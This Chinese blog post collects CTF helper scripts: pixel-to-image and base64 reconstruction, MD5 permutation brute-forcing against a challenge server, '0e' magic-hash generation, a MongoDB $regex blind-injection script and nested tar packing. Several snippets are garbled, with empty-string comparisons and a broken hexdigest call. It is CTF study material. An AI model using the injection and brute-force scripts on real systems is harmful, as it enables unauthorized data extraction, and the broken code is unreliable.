积累一点ctf需要掌握的常见脚本知识
1.利用像素点还原图片。
from PIL import Image
import re
if __name__ == '__main__':
x = 887 //将像素点个数进行分解,可以确定图片的长宽
y = 111
i = 0
j = 0 c = Image.new("RGB", (x,y))
file_object = open('ce.txt') //ce.txt中保存着像素点的坐标 for i in range(0, x):
for j in range(0, y):
line = file_object.next() //每次读取一个像素点
lst = line.split(",") //lst生成一个元组
c.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2]))) c.show()
c.save("c.png")
2.py requests方法的利用以及利用正则匹配查找文本暴力破解md5值。
#coding : utf8
import requests
import re
import hashlib
import itertools
s = requests.session() //建立一个session对话
url = "http://106.75.67.214:2050/?pass=bee7a613a8fa4f2f"
data = {'PHPSESSID':'6h7b4caq8bo41i3m5fg2983cq5'}
content = s.get(url=url,data=data)
target = re.findall("sh\"\>(.*)\<",content.text)
target = target[0]
poc = re.findall("code\"\>(.*)\<",content.text)
str1 = poc[0]
a = [''.join(x) for x in itertools.permutations(str1, 9)] //join方法是通过指定的字符串来连接序列元素从而构成新字符串,permutations用来生成无重复字符的元组
for i in range(0,len(a)):
final = hashlib.md5(a[i])
if final.hexdigest() == target:
flag = s.get(url="http://106.75.67.214:2050/?code="+a[i])
print flag.content
print flag.headers
3.利用py将base64编码的字符串还原成图片
import os,base64
strs='''''sdasdas==''' //已经编码的base64字符串 imgdata=base64.b64decode(strs)
file=open('1.jpg','wb')
file.write(imgdata)
file.close()
4.生成0e哈希值:
#coding:utf-8
import hashlib
import itertools
def go():
payload = [c for c in "qwertyuioplkjhgfdsazxcvbnm123654789"]
i = 0
print payload
for j in itertools.product(payload,repeat=30): #repeat参数指定长度
payloads = "".join(j)
#print pow
#i = i+ 1
#if i == 10:
# break
str1 = hashlib.md5(payloads).hexdigest + "SALT"
str2 = hashlib.md5(str1)
if (str2[0]=="") & (str2[1]=="e") & (str2[2:].isdigit()):
print payloads
go()
5.mongodb基于正则注入:
#coding:utf-8
import requests
import string
# print string.ascii_letters
# print string.digits
flag = "c1ctf{"
payload = string.ascii_letters + string.digits url = "http://xx.x.x.x/index.php?"
restsrt = True
while restsrt:
restsrt = False
for i in payload:
payloads = flag + i
post_data = {"username":"admin","passwd[$regex]":flag+".*"}
#post_data = {"username":"admin","passwd[$regex]":"^"+flag}
r = requests.get(url = url,data = post_data,allow_redirects = False)
if r.status_code == "":
print payloads
flag = flag + i
restsrt =True
if i == "}":
exit(0)
break
6.多次压缩打包
#coding:utf-8
import tarfile
for i in range(1,2):
tfile = tarfile.open("shell0.tar.gz","w:gz") #打包压缩
tfile.add("flag.py")
tfile.close() for i in range(1,300):
tfile = tarfile.open("shell"+str(i)+".tar.gz","w:gz")
tfile.add("1.php")
tfile.add("shell"+str(i-1)+".tar.gz")
tfile.close()
7.多次解压:
#coding:utf-8
import tarfile
for i in range(1,300)[::-1]:
file = tarfile.open("shell"+str(i)+"tar.gz")
file.extractall()
file.close()
积累一点ctf需要掌握的常见脚本知识的更多相关文章
- shell常见脚本30例
shell常见脚本30例 author:headsen chen 2017-10-19 10:12:12 本文原素材出自网上,特此申明.有些地方加入我自己的改动 常见的30例shell脚本 1.用 ...
- Python简单的CTF题目hash碰撞小脚本
Python简单的CTF题目hash碰撞小脚本 import hashlib for num in range(10000,9999999999): res = hashlib.sha1(str(nu ...
- Oracle手边常用70则脚本知识汇总
Oracle手边常用70则脚本知识汇总 作者:白宁超 时间:2016年3月4日13:58:36 摘要: 日常使用oracle数据库过程中,常用脚本命令莫不是用户和密码.表空间.多表联合.执行语句等常规 ...
- ctf密码学------密文解码python脚本(凯撒解密)
题目来源实验吧 分析题意,说是困在栅栏中,所以将字符栅栏解密看看有什么,利用工具CTFcraktools 得到三条密文 然后说是密码是凯撒,在将四栏依次凯撒解码,寻找可能的key,这里很显然,在尝试第 ...
- 放一点百度来的,常见的windowserror
0操作成功完成.1功能错误.2系统找不到指定的文件.3系统找不到指定的路径.4系统无法打开文件.5拒绝访问.6句柄无效.7存储控制块被损坏.8存储空间不足,无法处理此命令.9存储控制块地址无效.10环 ...
- python 常见脚本
一登录就发现了这篇博客,非常感谢作者,有时间会静下心来一点一滴的看 https://www.cnblogs.com/ailiailan/p/10141741.html
- bat脚本知识总结
1常用基本命令 1.1 @ 它的作用是让执行窗口中不显示它后面这一行的命令本身 1.2 echo 它其实是一个开关命令,就是说它只有两种状态:打开和关闭.于是就有了echo on 和echo off两 ...
- 积累一些不太常用的c语言知识(不断更新)
这里积累一些日常编程用得比较少的知识,不断添加. scanf("%c%*c%c",&a,&b); 其中的*表示跳过,本来输入三个数字,结果中间那个读入后被抛弃,a和 ...
- linux 常见基础知识(此文章将会在整个linux学习过程中,不断添加)
1,linux 文件类型 普通文件 目录文件 链接文件 块设备 字符设备 Socket 管道文件 - d l b c s p 2,linux 文件属性 蓝色 绿色 浅蓝色 红色 灰色 目录 可执行文件 ...
随机推荐
- C++函数重载和函数模板
1.函数重载 这是小菜鸟写的一个例子. 函数重载应该注意以下几点: 1.1重载函数有类似的功能: 1.2只能以参数的类型(形参个数和类型)来重载函数, int max(int a,int b);flo ...
- 利用反射与dom4j读取javabean生成对应XML和读取XML得到对应的javabean对象集合
转自:http://blog.csdn.net/zhao19861029/article/details/8473245 首先实现生成对应的JAVAbean的XML文件方法 /** * DMO4J写入 ...
- hihoCoder 1309:任务分配 贪心 优先队列
#1309 : 任务分配 时间限制:10000ms 单点时限:1000ms 内存限制:256MB 描述 给定 N 项任务的起至时间( S1, E1 ), ( S2, E2 ), ..., ( SN, ...
- Asp.net操作cookie大全
实例代码: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 3 ...
- workflow createPath
针对不同的流程,createpath不同,但是创建审批链,和创建表都有 1.GetUserInfoByListColumn 控件已创建的.先Rebuild,属性需要注意 2.CreateListIte ...
- Cassandra-几个基本测试常识
一 使用ycsb进行装载,每次装载都不会删除以前装载过的. 因此如果想在空数据库中装载,需要先情况数据表. drop命令删除整个表,因此需要重建标头. truncate命令删除表的所有行,只留下表头, ...
- STL 跨模块 调用 异常 解决
本文为转载别人的,以作收藏之用 百度了一天,现在把结论放上边: 1.不要用STL(std::string属于STL)来跨模块传输数据,例如:dll(so)之间,dll(so)和exe(elf)之间. ...
- GDI+ 发生一般性错误解决办法
错误的代码g对象继续占用 未释放资源 如果路径不一样 没问题 相同路径 获取图片进行 缩略会造成GDI错误 /// <summary> /// 生成缩略图 /// </summary ...
- TColor 与 RGB 的转换函数
function RGB2TColor(const R, G, B: Byte): Integer;begin // convert hexa-decimal values to RGB Resu ...
- 判断Window在哪个屏幕
最近在做窗口最大化时需要一个功能,如果是多个显示器的话,需要在当前显示器最大化,由于是根据屏幕长宽进行设置Window大小,没有使用WindowState.Maximized,window.Left不 ...